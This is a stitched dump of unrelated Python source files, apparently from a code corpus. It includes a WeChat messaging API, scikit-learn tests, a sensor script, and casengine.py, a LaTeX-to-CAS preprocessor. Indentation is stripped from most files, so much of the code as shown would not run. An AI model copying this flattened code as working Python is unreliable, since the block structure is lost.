"""construct an INI file, optionally reading in from inputfile."""
self.UnitClass = unitclass
self._dialect = dialects.get(dialect, DialectDefault)() # fail correctly/use getattr/
base.TranslationStore.__init__(self, unitclass=unitclass)
self.units = []
self.filename = ''
self._inifile = None
if inputfile is not None:
self.parse(inputfile)
def serialize(self):
_outinifile = self._inifile
for unit in self.units:
for location in unit.getlocations():
match = re.match('\\[(?P<section>.+)\\](?P<entry>.+)', location)
_outinifile[match.groupdict()['section']][match.groupdict()['entry']] = self._dialect.escape(unit.target)
if _outinifile:
return str(_outinifile)
else:
return b""
def parse(self, input):
"""Parse the given file or file source string."""
if hasattr(input, 'name'):
self.filename = input.name
elif not getattr(self, 'filename', ''):
self.filename = ''
if hasattr(input, "read"):
inisrc = input.read()
input.close()
input = inisrc
if isinstance(input, bytes):
input = BytesIO(input)
self._inifile = INIConfig(input, optionxformvalue=None)
else:
            self._inifile = INIConfig(open(input), optionxformvalue=None)
for section in self._inifile:
for entry in self._inifile[section]:
source = self._dialect.unescape(self._inifile[section][entry])
newunit = self.addsourceunit(source)
newunit.addlocation("[%s]%s" % (section, entry))
| claudep/translate | translate/storage/ini.py | Python | gpl-2.0 | 4,052 |
# -*- coding: utf-8 -*-
from optionaldict import optionaldict
from wechatpy.client.api.base import BaseWeChatAPI
class WeChatKFMessage(BaseWeChatAPI):
"""
    Send WeChat customer service (KF) messages
    https://work.weixin.qq.com/api/doc/90000/90135/94677
    Supported message types:
    * text
    * image
    * voice
    * video
    * file
    * news link
    * mini program
    * menu
    * location
"""
def send(self, user_id, open_kfid, msgid="", msg=None):
"""
        When a WeChat customer is in the "newly received, pending" state or is
        being handled by the smart assistant, this interface can be called to
        send messages to that customer.
        Note that the enterprise may only send messages to a customer within
        48 hours after the customer last proactively messaged the service
        account, and at most 5 messages; if the customer sends another message,
        the enterprise may send messages again.
        Supported message types: text, image, voice, video, file, news link,
        mini program, menu, location.
        :param user_id: UserID of the customer receiving the message
        :param open_kfid: ID of the customer service account sending the message
        :param msgid: optional message ID
        :param msg: dict object describing the message to send
        :type msg: dict | None
        :return: result of the API call
"""
msg = msg or {}
data = {
"touser": user_id,
"open_kfid": open_kfid,
}
if msgid:
data["msgid"] = msgid
data.update(msg)
return self._post("kf/send_msg", data=data)
def send_text(self, user_id, open_kfid, content, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={"msgtype": "text", "text": {"content": content}},
)
def send_image(self, user_id, open_kfid, media_id, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={"msgtype": "image", "image": {"media_id": media_id}},
)
def send_voice(self, user_id, open_kfid, media_id, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={"msgtype": "voice", "voice": {"media_id": media_id}},
)
def send_video(self, user_id, open_kfid, media_id, msgid=""):
video_data = optionaldict()
video_data["media_id"] = media_id
return self.send(
user_id,
open_kfid,
msgid,
msg={"msgtype": "video", "video": dict(video_data)},
)
def send_file(self, user_id, open_kfid, media_id, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={"msgtype": "file", "file": {"media_id": media_id}},
)
def send_articles_link(self, user_id, open_kfid, article, msgid=""):
articles_data = {
"title": article["title"],
"desc": article["desc"],
"url": article["url"],
"thumb_media_id": article["thumb_media_id"],
}
return self.send(
user_id,
open_kfid,
msgid,
msg={"msgtype": "news", "link": {"link": articles_data}},
)
def send_msgmenu(self, user_id, open_kfid, head_content, menu_list, tail_content, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={
"msgtype": "msgmenu",
"msgmenu": {"head_content": head_content, "list": menu_list, "tail_content": tail_content},
},
)
def send_location(self, user_id, open_kfid, name, address, latitude, longitude, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={
"msgtype": "location",
"msgmenu": {"name": name, "address": address, "latitude": latitude, "longitude": longitude},
},
)
def send_miniprogram(self, user_id, open_kfid, appid, title, thumb_media_id, pagepath, msgid=""):
return self.send(
user_id,
open_kfid,
msgid,
msg={
"msgtype": "miniprogram",
"msgmenu": {"appid": appid, "title": title, "thumb_media_id": thumb_media_id, "pagepath": pagepath},
},
)
| wechatpy/wechatpy | wechatpy/work/client/api/kf_message.py | Python | mit | 4,405 |
"""
OwO whats this?
"""
__author__ = ('Smurphicus')
COMMAND = 'owo'
from random import choice
substitutions = {'r':'w','R':'W','l':'w','L':'W','na':'nya','NA':'NYA','qu':'qw','QU':'QW'}
faces = [' OwO', ' owo', ' UwU', ' uwu', ' :3', ' :33', ' :333', '']
def owoify(message):
for key in substitutions.keys():
message = message.replace(key,substitutions[key])
return message + choice(faces)
def main(bot, author_id, message, thread_id, thread_type, **kwargs):
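    # Fetch the message immediately before the triggering "owo" command;
    # index 0 of the (newest-first) result is the command message itself.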
message = bot.fetchThreadMessages(thread_id=thread_id, limit=2)[1]
owoified_message = owoify(message.text)
bot.sendMessage(owoified_message, thread_id=thread_id, thread_type=thread_type)
| sentriz/steely | steely/plugins/owo.py | Python | gpl-3.0 | 679 |
import nose
import numpy as np
from scipy import sparse as sp
from sklearn.svm.bounds import l1_min_c
from sklearn.svm import LinearSVC
from sklearn.linear_model.logistic import LogisticRegression
from sklearn.svm.sparse import LinearSVC as SparseSVC
from sklearn.linear_model.sparse.logistic import LogisticRegression as \
SparseLogRegression
dense_X = [[-1, 0], [0, 1], [1, 1], [1, 1]]
sparse_X = sp.csr_matrix(dense_X)
Y1 = [0, 1, 1, 1]
Y2 = [2, 1, 0, 0]
def test_l1_min_c():
losses = ['l2', 'log']
Xs = {'sparse': sparse_X, 'dense': dense_X}
Ys = {'two-classes': Y1, 'multi-class': Y2}
intercepts = {'no-intercept': {'fit_intercept': False},
'fit-intercept': {'fit_intercept': True,
'intercept_scaling': 10}}
for loss in losses:
for X_label, X in Xs.items():
for Y_label, Y in Ys.items():
for intercept_label, intercept_params in intercepts.items():
check = lambda: check_l1_min_c(X, Y, loss,
**intercept_params)
check.description = 'Test l1_min_c loss=%r %s %s %s' % \
(loss, X_label, Y_label, intercept_label)
yield check
def check_l1_min_c(X, y, loss, fit_intercept=True, intercept_scaling=None):
min_c = l1_min_c(X, y, loss, fit_intercept, intercept_scaling)
clf = {
('log', False): LogisticRegression(penalty='l1'),
('log', True): SparseLogRegression(penalty='l1'),
('l2', False): LinearSVC(loss='l2', penalty='l1', dual=False),
('l2', True): SparseSVC(loss='l2', penalty='l1', dual=False),
}[loss, sp.issparse(X)]
clf.fit_intercept = fit_intercept
clf.intercept_scaling = intercept_scaling
clf.C = min_c
clf.fit(X, y)
assert (np.asanyarray(clf.coef_) == 0).all()
assert (np.asanyarray(clf.intercept_) == 0).all()
clf.C = min_c * 1.01
clf.fit(X, y)
assert (np.asanyarray(clf.coef_) != 0).any() or \
(np.asanyarray(clf.intercept_) != 0).any()
@nose.tools.raises(ValueError)
def test_ill_posed_min_c():
X = [[0, 0], [0, 0]]
y = [0, 1]
l1_min_c(X, y)
@nose.tools.raises(ValueError)
def test_unsupported_loss():
l1_min_c(dense_X, Y1, 'l1')
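# A minimal usage sketch of the bound under test (illustrative values):
#
#     from sklearn.svm.bounds import l1_min_c
#     c_min = l1_min_c(dense_X, Y1, loss='log')
#     # any C below c_min yields an all-zero l1-penalised model,
#     # so a C grid search should start above this bound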
| ominux/scikit-learn | sklearn/svm/tests/test_bounds.py | Python | bsd-3-clause | 2,389 |
# -*- coding: utf-8 -*-
"""
Tests specific to the mock backend.
"""
import pytest
pytestmark = pytest.mark.usefixtures("teardown_cauldron")
from ..conftest import fail_if_not_teardown
@pytest.fixture
def backend(request):
"""Use the local backend."""
from Cauldron.api import use
use('mock')
request.addfinalizer(fail_if_not_teardown)
@pytest.fixture
def mock_service(backend, servicename, config, keyword_name):
"""A 'mock' service, which is forgiving."""
from Cauldron.DFW import Service
svc = Service(servicename, config=config)
mykw = svc[keyword_name]
return svc
@pytest.fixture
def mock_client(request, servicename):
"""A 'mock' client, which doesn't even require a service backend."""
from Cauldron import ktl
svc = ktl.Service(servicename)
request.addfinalizer(svc.shutdown)
return svc
def test_duplicate_services(backend, servicename):
"""Test duplicate 'mock' services."""
from Cauldron.DFW import Service
svc = Service(servicename, config=None)
with pytest.raises(ValueError):
svc2 = Service(servicename, config=None)
svc3 = Service.get_service(servicename)
assert svc3 is svc
def test_client_not_started(backend, servicename):
"""Use mock, don't fail when a client hasn't been started yet."""
from Cauldron.ktl import Service
Service(servicename)
def test_mock_has_keyword(backend, mock_client):
"""Mock has a client."""
assert mock_client.has_keyword("anyvaluewilldo") | alexrudy/Cauldron | Cauldron/tests/test_mock.py | Python | bsd-3-clause | 1,510 |
#!/usr/bin/python
import sys
import time
import FXOS8700CQR1 as imuSens
from ctypes import *
imuSens = imuSens.FXOS8700CQR1() #Configure chip in hybrid mode
def main(argv):
id = imuSens.getID() #Verify chip ID
print "Chip ID: 0x%02X. \r\n" % id
imuSens.standbyMode()
imuSens.activeMode()
id = imuSens.getChipMode() #Configure sensor as accelerometer
print "Chip Mode: 0x%02X. \r\n" % id
id = imuSens.getTemperature()
print "Chip Temperature: 0x%02X. \r\n" % id
def L1():
print "Landscape right.\r\n"
def L2():
print "Landscape left. \r\n"
def P1():
print "Portrait down.\r\n"
def P2():
print "Portrait up.\r\n"
options = {0 : L1,
1 : L2,
2 : P1,
3 : P2
}
imuSens.configureAccelerometer()
imuSens.configureMagnetometer()
imuSens.configureOrientation();
modeprevious = 0
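    # Poll the status register; when it flags new data, decode the two
    # orientation bits and print a message whenever the orientation changes.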
while True:
if(imuSens.readStatusReg() & 0x80):
orienta = imuSens.getOrientation()
mode = (orienta >> 1) & 0x03
if (mode != modeprevious):
options[mode]()
modeprevious = mode
print "Shutting down"
if __name__ == '__main__':
try:
main(sys.argv[1:])
except KeyboardInterrupt:
print("")
| sensorian/sensorian-firmware | Drivers_Python/FXOS8700CQR1/EX3_Orientation.py | Python | lgpl-3.0 | 1,196 |
from automlk.store import get_key_store, list_key_store, lpush_key_store
from automlk.config import *
dataset_id = '42'
round_id = 1
results = list_key_store('dataset:%s:rounds' % dataset_id)
for r in results:
if r['round_id'] == round_id:
# print(r)
# reinject this round in another dataset experiment
msg_search = {'dataset_id': '47', 'round_id': 107, 'solution': r['solution'], 'level': 1,
'ensemble_depth': 0, 'model_name': r['model_name'], 'model_params': r['model_params'], 'pipeline': r['pipeline'],
'threshold': 0, 'time_limit': 10000}
print('sending %s' % msg_search)
lpush_key_store(SEARCH_QUEUE, msg_search)
| pierre-chaville/automlk | tests/test_inject.py | Python | mit | 685 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# LICENCE: GNU AFFERO GENERAL PUBLIC LICENSE v.3 https://github.com/dlfer/casengine/blob/master/LICENSE
# https://github.com/dlfer/casengine
# (C) DLFerrario http://www.dlfer.xyz
r"""
# Version: 2020-04-01
casengine.py [options] [filename]
a Pre-Processor for (La)TeX files that interacts with Computer Algebra Systems: sympy, maple, ...
RUN: casengine.py < example.tex > example_out.tex
[or] casengine.py example.tex
==> example_symout.tex generated
OPTIONS:
--help|-h Help
--verbose|-v Verbose Running
--output=|-o [FILENAME] explicit output filename
--sty Generate the file `casengine.sty` in the current dir.
--noexec|-n Do not execute any sympy code.
EXAMPLES:
$ casengine.py --sty
$ casengine.py -o example_out.tex example.tex
LATEX:
%s
=>
%s
https://github.com/dlfer/casengine
(C) DLFerrario http://www.dlfer.xyz
"""
from __future__ import absolute_import
import sys
import re
import os
import getopt
import datetime, time
from six.moves import range
#--------------------------------------------------------------------------
__sty__=r"""
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\def\fileversion{0.92}
\def\filedate{2017-06-12}
\def\Copyright{**********************************************
This work has been released under the Creative Commons Attribution - NonCommercial - NoDerivatives 3.0 Unported licence. To read a copy of the licence, visit http://creativecommons.org/licenses/by-nc-nd/3.0/ or send a letter to Creative Commons, 171 Second Street, Suite 300, San Francisco, California, 94105, USA.
Credits to https://tex.stackexchange.com/questions/127010/how-can-i-make-lstinline-function-normally-inside-math-mode
(C) DLFerrario http://www.dlfer.xyz
**********************************************
}
\NeedsTeXFormat{LaTeX2e}[1996/06/01]
\typeout{Package `CasEngine' <\filedate>.}
\typeout{\Copyright}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\usepackage{kvoptions}
\SetupKeyvalOptions{
family = CAS,
prefix = CAS@
}
\DeclareStringOption{CAS}
\DeclareStringOption{CASOptions}
\DeclareStringOption{CASPrompt}
\DeclareStringOption{CASLatex}
\DeclareStringOption{CASLatexOutsep}
\DeclareStringOption{CASAssignString}
\DeclareStringOption{CASPreamble}
\ProcessKeyvalOptions*
\typeout{%
CAS=\CAS@CAS,
CASOptions=\CAS@CASOptions,
CASPrompt=\CAS@CASPrompt,
CASLatex=\CAS@CASLatex,
CASLatexOutsep=\CAS@CASLatexOutsep,
CASAssignString=\CAS@CASAssignString,
CASPreamble=\CAS@CASPreamble
}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\RequirePackage{listings}
\lstset{language=Python,
basicstyle=\ttfamily,
mathescape=true
}
\usepackage{letltxmacro}
\newcommand*{\SavedLstInline}{}
\LetLtxMacro\SavedLstInline\lstinline
\DeclareRobustCommand*{\lstinline}{%
\ifmmode
\let\SavedBGroup\bgroup
\def\bgroup{%
\let\bgroup\SavedBGroup
\hbox\bgroup
}%
\fi
\SavedLstInline
}
\newenvironment{symfor}[2]{%
\noindent\lstinline|((for #1 in [#2] ))|
}{%
\noindent\lstinline|((end for ))|
}
\newcommand{\sym}[1]{%
\lstinline|(( #1 ))|
}
\newcommand{\symexec}[1]{%
\lstinline|((symexec: #1 ))|
}
"""
#--------------------------------------------------------------------------
VERBOSE=False
NOEXEC=False
#--------------------------------------------------------------------------
example_tex=r"""
% the following command restart the NameSpace (it is the only non-python command)
\symexec{CLEAR}
\symexec{x=t**2-t-1
y=t**3-t**2+1}
\begin{symfor}{A}{x+1;x-2;y+4} % separator is ";", every symbolic expression in between
\begin{symfor}{t}{range(-1,2)} % same syntax as python (1,2 or 3 arguments)
$t=\sym{t}$ %its value
\end{symfor}
Now this is the first line
This is the second line:
$\sym{1+1}$ %its value
\symexec{B=A**3} % execute code
\[
\sym{factor(B+A**2)}
\]
Last line
\end{symfor}
"""
example_tex_maple=r"""
\documentclass[a4paper,twoside,leqno]{article}
\usepackage{amsmath,amsthm,amssymb,amsfonts}
\usepackage{mathpazo} % I like it.
\usepackage[CAS=maple]{casengine}
\newcounter{exer}
\numberwithin{exer}{subsection}
\renewcommand{\theexer}{(E\arabic{exer})}
\renewcommand{\thesubsection}{\Alph{subsection})}
\newtheoremstyle{exer}% name
{24pt}% Space above
{24pt}% Space below
{}% Body font: it was: \itshape
{}% Indent amount (empty = no indent, \parindent = para indent)
{\bfseries}% Thm head font
{}% Punctuation after thm head
{.5em}% Space after thm head: " " = normal interword space;
% \newline = linebreak
{}% Thm head spec (can be left empty, meaning `normal')
\theoremstyle{exer}
\newtheorem{exe}[exer]{}
\begin{document}
\section{Esercizi}
\begin{symfor}{q}{range(1,3)}%
\begin{symfor}{c}{range(1,3)}%
\begin{symfor}{x}{cos(t);sin(t);tan(t);exp(t);cosh(t);sinh(t);t**3-t**2+t-1}%
\symexec{g:=q*x+c;}
\begin{exe}
Try to compute
\symexec{F:=Diff(expand(g),t);}
\[
\sym{F}
\]
Answer: $\sym{simplify(value(F))}$.
\end{exe}
\end{symfor}
\end{symfor}
\end{symfor}
\end{document}
"""
#--------------------------------------------------------------------------
def my_strftime(td):
secs=td.total_seconds()
x=secs - td.seconds
h, rem = divmod(secs,60*60)
m,s = divmod(rem,60)
return "%02i:%02i:%02i%s" % (h,m,s, ("%.02f" % (x))[1:] )
#--------------------------------------------------------------------------
class Logger():
def write(self,s):
dt=datetime.datetime.fromtimestamp(int(time.time()))
global VERBOSE
if VERBOSE:
sys.stderr.write("# %s #: %s" % (dt.isoformat(" "), s))
def msg(self,s):
sys.stderr.write("%s" % s)
def times(self,start_time,end_time,filename, casengine=None):
FMT="YYYY-MM-DD HH:MM:SS" # what for?
start_datetime=datetime.datetime.fromtimestamp(int(start_time))
end_datetime=datetime.datetime.fromtimestamp(int(end_time))
elapsed_time=datetime.timedelta(seconds=end_time-start_time)
output="File %s created by casengine.py (CAS engine: %s)\nStarted: %s\nFinished: %s\nElapsed time: %s\n" % (filename,casengine, start_datetime.isoformat(" "), end_datetime.isoformat(" "), my_strftime(elapsed_time) )
return output
LOG=Logger()
#--------------------------------------------------------------------------
class CasEngine(object):
def __init__(self,name=None,start_time=time.time(),do_cas_init=True):
LOG.write("__init__ called!\n")
        self.reg_forcycleiter=re.compile( r"(\\begin{symfor}{(?P<var>.+?)}{(?P<symlist>.+?)})|(\\end{symfor})", re.M | re.DOTALL)
# self.reg_forcycleiter=re.compile( r"(\n\\symfor{(?P<var>.+?)}{(?P<symlist>.+?)})|(\n\\symforend)", re.M and re.DOTALL)
self.reg_symexec=re.compile(r"\\symexec{")
        self.reg_sym=re.compile(r"\\(sym|symexec){(?P<symdata>.+?)}", re.M | re.DOTALL)
self.reg_range=re.compile(r" *range\((?P<rangearg>.+)\)" )
self.name=name
self.localNameSpace={}
self.cas_engine=None
if do_cas_init: self.cas_init()
self.number_of_syms=None #initialized by filter
self.number_of_syms_iter=None
self.start_time=start_time
# To be defined according to wich CAS system...
def cas_latex(self):
return "LATEX"
def cas_init(self):
LOG.write("nothing done!\n")
def cas_exec(self,s):
return None
def cas_get(self,s):
return None
def cas_let(self,a,b):
return None
def cas_forlist(self,s):
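        # For example (illustrative): "range(1,4)" yields ['1', '2', '3'],
        # while "x+1;x-2;y+4" yields ['x+1', 'x-2', 'y+4'].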
mo=self.reg_range.search(s)
if mo:
# sanitize the input of the eval...
return ["%s" % x for x in eval("range(%s)" % mo.group('rangearg') , {'__builtins__':None}, {'range': range } ) ]
else:
return s.split(';')
def tex_comment(self,s):
return "".join([("%%%s" % l) for l in s.splitlines(True)])
#Now: common functions to parse LaTeX
def expand_forcycle(self,s):
LOG.write("expand_forcycle called on a tex string of length: %s chars\n%s\n" % (len(s),s) )
if self.reg_forcycleiter.search(s):
all = [ff for ff in self.reg_forcycleiter.finditer(s)]
lenall=len(all)
for i in range(lenall-1):
if all[i].group('var') and not all[i+1].group('var'):
s_before=s[:all[i].start()]
s_during=s[all[i].end():all[i+1].start()]
s_after=s[all[i+1].end():]
s_var=all[i].group('var')
s_symlist=self.cas_forlist(all[i].group('symlist'))
s_symlist_tokens=[ "%%%%sym_for %s:\n\symexec{%s}%s%%%%end sym_for %s" % (s_var,self.cas_let( s_var, x) ,s_during, s_var) for x in s_symlist ]
s_during_expanded = "\n".join(s_symlist_tokens)
return self.expand_forcycle( ( s_before + s_during_expanded + s_after ) )
raise Exception ("CasEngine ERROR: symfor does not end well!\n")
else:
return s
def sym_filter(self,s):
LOG.write("sym_filter called on a tex string of length: %s chars\n" % len(s))
self.number_of_syms=len(self.reg_sym.findall(s))
self.number_of_syms_iter=0
LOG.write("There are %s sym's to be processed...\n" % self.number_of_syms)
return self.reg_sym.sub(self.my_filter_func,s)
def my_filter_func(self,ob):
self.number_of_syms_iter += 1
ETA=(time.time() - self.start_time) * (self.number_of_syms*1.0/self.number_of_syms_iter - 1 )
ETAstr=my_strftime(datetime.timedelta(seconds=ETA))
numlen=str(len(str(self.number_of_syms)))
if VERBOSE:
LOG.msg(("\rProgress: %"+numlen+"i/%i (%6.2f%%: ETA = %s) ") \
% (self.number_of_syms_iter, self.number_of_syms ,
self.number_of_syms_iter * 100.0 / self.number_of_syms ,ETAstr ))
else:
LOG.msg(".")
if self.reg_symexec.match(ob.group()):
if ob.group('symdata').strip() == 'CLEAR':
LOG.write("Trying to clear namespace...\n")
#preserve the number of syms...
tmpsyms=self.number_of_syms
tmpsyms_iter=self.number_of_syms_iter
self.__init__(name=self.name,start_time=self.start_time)
self.number_of_syms=tmpsyms
self.number_of_syms_iter=tmpsyms_iter
LOG.write(" ...done!\n")
return self.tex_comment(" ==> NameSpace CLEARED")
else:
return self.cas_exec( ob.group('symdata') )
else:
return self.cas_get( ob.group('symdata') )
#--------------------------------------------------------------------------
class SympyEngine(CasEngine):
def cas_init(self):
exec(r"""
from sympy import __version__
from sympy.abc import *
from sympy import *
""" , self.localNameSpace)
self.cas_engine="SymPy Version %s" % self.localNameSpace['__version__']
def cas_exec(self,s):
output='cas_exec: %s' % s
try:
exec(s, self.localNameSpace)
except Exception as v:
output += " => ERROR: %s\n" % v
raise Exception("SymPy Error: %s while processing command `%s'" % (v,s) )
return self.tex_comment(output)
def cas_get(self,s):
exec(r"""output_string=latex(sympify(%s))""" % s, self.localNameSpace)
return self.localNameSpace['output_string']
def cas_let(self,a,b):
"""Return the string to assign variable value b to a"""
return "%s=%s" % (a,b)
#--------------------------------------------------------------------------
def remove_ansi_escape(line):
ansi_escape =re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]')
ansi_escape =re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
return ansi_escape.sub(" ",line)
# return ansi_escape.sub(b'', line.encode()).decode('utf-8')
#--------------------------------------------------------------------------
class ExpectEngine(CasEngine):
def cas_init(self,
cas='REMOVEDmaple',
cas_options='-t -c "interface(screenwidth=infinity,errorcursor=false)"',
cas_prompt='#-->',
cas_latex='latex(%s);',
cas_latex_outsep='\n',
cas_assign_string='%s:= %s;',
cas_preamble=None):
import pexpect
self.EOF=pexpect.EOF
self.cas_name=cas
self.cas_engine="pExpect -> %s " % cas
self.cas_prompt=cas_prompt
self.cas_latex=cas_latex
self.cas_latex_outsep=cas_latex_outsep
self.cas_assign_string=cas_assign_string
cas_torun=(cas +" " + cas_options)
# self.child = pexpect.spawn(cas_torun , timeout=60, ignore_sighup=False ,encoding='utf-8', env = {"TERM": "dumb"} )
os.environ["TERM"] = "dumb"
os.environ["IPY_TEST_SIMPLE_PROMPT"] = "True"
self.child = pexpect.spawn(cas_torun , timeout=60, ignore_sighup=False ,encoding='utf-8' )
self.child.expect(self.cas_prompt)
if cas_preamble:
for x in cas_preamble.split("\n"):
self.child.sendline(x)
self.child.expect(self.cas_prompt)
return
def cas_exec(self,s):
output='cas_exec: %s' % ( s, )
self.child.sendline(s)
self.child.expect(self.cas_prompt)
out_null=self.child.before ## what for?
return self.tex_comment(output)
def cas_get(self,s):
self.child.sendline(self.cas_latex % s)
self.child.expect(self.cas_prompt)
out=remove_ansi_escape(self.child.before)
# out = out[out.find(';')+1:].strip() ## __TODO__ change also this...
# out = out[out.find('\n')+1:].strip() ## __TODO__ change also this...
if self.cas_name=='maxima':
tokens=out.split(self.cas_latex_outsep)
out = " ".join(tokens[1:-1])
out=out.strip()
else:
out = out[out.find(self.cas_latex_outsep)+len(self.cas_latex_outsep):].strip()
LOG.write("Found cas_get `%s`" % out)
return out
def cas_let(self,a,b):
# TODO: switch cases...
return self.cas_assign_string % (a,b)
def __del__(self):
LOG.write("Trying to clean up spawn processes...\n")
# self.child.sendline("quit()")
# self.child.expect(self.cas_prompt) #__TODO__ cmaple all the time running...
self.child.sendeof()
# self.child.expect(self.EOF)
self.child.close()
self.child.terminate()
#--------------------------------------------------------------------------
# "%colors NoColor"
DEFAULT_OPTIONS={
'maple': {'CASOptions': '-t -c "interface(screenwidth=infinity,errorcursor=false)"' , 'CASPrompt': '#-->' , 'CASLatex': 'latex(%s);' , 'CASLatexOutsep':'\n', 'CASAssignString': '%s:= %s;' , 'CASPreamble' : '' },
'sage-5' : {'CASOptions': '-q', 'CASPrompt': 'sage: ', 'CASLatex': 'latex(%s)', 'CASLatexOutsep':'\n', 'CASAssignString' : '%s= %s' , 'CASPreamble': "%colors NoColor"},
'sage' : {'CASOptions': '-q', 'CASPrompt': '(sage: |>>> )', 'CASLatex': '%s', 'CASLatexOutsep':'\n', 'CASAssignString' : '%s= %s' , 'CASPreamble': "%colors NoColor\nfrom IPython.terminal.prompts import ClassicPrompts\nip = get_ipython()\nip.prompts = ClassicPrompts(ip)"},
'math' : {'CASOptions': '-rawterm', 'CASPrompt': 'In[[0-9]+]:=', 'CASLatex': 'TeXForm [%s]', 'CASLatexOutsep':'TeXForm=', 'CASAssignString' : '%s= %s' , 'CASPreamble': ""},
'gap' : {'CASOptions': '-b -T ', 'CASPrompt': 'gap>', 'CASLatex': 'Print(%s);', 'CASLatexOutsep':';', 'CASAssignString' : '%s:= %s;' , 'CASPreamble': ""},
'maxima' : {'CASOptions': '-q --disable-readline', 'CASPrompt': '(%i[0-9]+)', 'CASLatex': 'tex(%s)$', 'CASLatexOutsep':'$$', 'CASAssignString' : '%s: %s $' , 'CASPreamble': ""}
}
# GAP LaTeXObj not working yet...
#--------------------------------------------------------------------------
def latex_unescape(s):
tmps=re.sub(r"\\%","%",s)
return tmps
#--------------------------------------------------------------------------
def get_cas_options(s):
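    # For example (illustrative): a source line "\usepackage[CAS=maple]{casengine}"
    # resolves to the 'maple' entry of DEFAULT_OPTIONS above.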
global DEFAULT_OPTIONS
options={}
reg_cas_options=re.compile(r"^\\usepackage\[(?P<CasOptions>.+?)\]{casengine}", re.M)
mo=reg_cas_options.search(s)
if mo:
LOG.write("cas_options found: %s\n" % mo.group('CasOptions') )
for token in mo.group('CasOptions').split(","):
k,v=token.partition("=")[::2]
options[k.strip()]=latex_unescape(v.strip())
else:
LOG.write("No cas_options found\n" )
return options
if 'CAS' in options and options['CAS'] in DEFAULT_OPTIONS:
result=DEFAULT_OPTIONS[options['CAS']]
for k in options:
result[k]=options[k]
else:
LOG.msg("WARNING: option %s has no default! Errors ahead...\n" % options['CAS'])
result=options
LOG.write(options)
return result
#--------------------------------------------------------------------------
def get_opt():
global VERBOSE, NOEXEC
explicit_output=False
try:
opts,args = getopt.getopt(sys.argv[1:],"hvno:",["help","output=","sty","verbose","noexec"])
except getopt.GetoptError as err:
sys.stderr.write("GetOpt Error: %s\n[option --help for help]\n" % err)
sys.exit(2)
for o,a in opts:
if o in ("-v", "--verbose"):
VERBOSE = True
elif o in ("-n", "--noexec"):
NOEXEC = True
elif o in ("-h", "--help"):
sys.stdout.write(__doc__ % (example_tex, example_test() ) )
sys.exit()
elif o in ("--sty",):
fd=open('casengine.sty','w')
fd.write(__sty__)
fd.close()
LOG.msg("File %s created!\n" % fd.name)
sys.exit()
elif o in ("-o","--output"):
explicit_output=True
fd_output=open(a,'w')
else:
assert False, "unhandled option"
if len(args)==0:
input_data=sys.stdin.read()
if not explicit_output:
fd_output=sys.stdout
else:
input_data=open(args[0]).read()
if not explicit_output:
b,e=os.path.splitext(args[0])
fd_output=open("%s_symout%s" % (b,e),'w')
return input_data, fd_output
#--------------------------------------------------------------------------
def example_test():
SE=SympyEngine()
# SE=ExpectEngine()
# s= SE.expand_forcycle(example_tex_maple)
s= SE.expand_forcycle(example_tex)
if VERBOSE: LOG.msg("GET_CAS_DATA: %s\n"% get_cas_options(example_tex_maple))
return(SE.sym_filter(s))
#--------------------------------------------------------------------------
def old_main():
SE=SympyEngine()
s=sys.stdin.read()
LOG.write("expand for cycles...")
s=SE.expand_forcycle(s)
LOG.write("done!\n")
sys.stdout.write(SE.sym_filter(s))
LOG.write("Finished!\n")
#--------------------------------------------------------------------------
def main():
global VERBOSE, NOEXEC
start_time=time.time()
input_data,fd_output = get_opt()
cas_options=get_cas_options(input_data)
if VERBOSE: LOG.write("cas_options: %s\n" % cas_options)
if cas_options:
SE=ExpectEngine(name=cas_options['CAS'],do_cas_init=False)
SE.cas_init(cas=cas_options['CAS'],
cas_prompt=cas_options['CASPrompt'],
cas_options=cas_options['CASOptions'],
cas_latex=cas_options['CASLatex'],
cas_latex_outsep=cas_options['CASLatexOutsep'],
cas_assign_string=cas_options['CASAssignString'],
cas_preamble=cas_options['CASPreamble']
)
LOG.msg(" => Found CAS Engine= %s\n" % cas_options['CAS'])
else:
LOG.msg("No CAS Engine Stated: using SymPy\n" )
SE=SympyEngine()
expanded_data=SE.expand_forcycle(input_data)
LOG.write("done expanding forcycles!\n")
if NOEXEC:
LOG.write("NOT executing symexec and sym commands...\n")
output_data=expanded_data
else:
LOG.write("now executing symexec and sym commands...\n")
output_data=SE.sym_filter(expanded_data)
end_time=time.time()
fd_output.write(SE.tex_comment( LOG.times(start_time,end_time,fd_output.name, casengine=SE.cas_engine) ) )
fd_output.write(output_data)
LOG.msg("\n")
del SE
LOG.msg("\n => ...done! File %s created!\n" % fd_output.name)
if __name__=='__main__':
# example_test()
main()
| dlfer/casengine | casengine.py | Python | agpl-3.0 | 19,507 |
# An extension of `tuple` that loops indices.
class Ring(tuple):
def __getitem__(self, key):
length = len(self)
# For slices, one index must still be in the usual range
# To trigger the special behaviour, the indices must be different and one must be outside the usual range
# To get the looping effect, modulo the start and stop and index into two copies of the original tuple
if isinstance(key, slice):
start, stop = key.start, key.stop
if start is None:
start = 0
if stop is None:
stop = length
if start > length or stop < 0 or stop-start > length:
raise IndexError
if start != stop and (start < 0 or stop > length):
start %= length
stop %= length
if start >= stop:
return (self+self)[slice(start,stop+length,key.step)]
# For int key, just modulo the index
elif isinstance(key, int):
key %= length
# Fall-through: if no special case has been triggered, call the super() version
return super().__getitem__(key)
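# Illustrative behaviour (not part of the original class):
#   r = Ring((0, 1, 2, 3))
#   r[5]    -> 1        # integer indices wrap modulo len(r)
#   r[3:5]  -> (3, 0)   # slices that run past the end wrap around
#   r[1:3]  -> (1, 2)   # in-range slices behave like a normal tuple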
| peterolph/hAIve | ponder/ring.py | Python | mit | 1,181 |
import urllib2
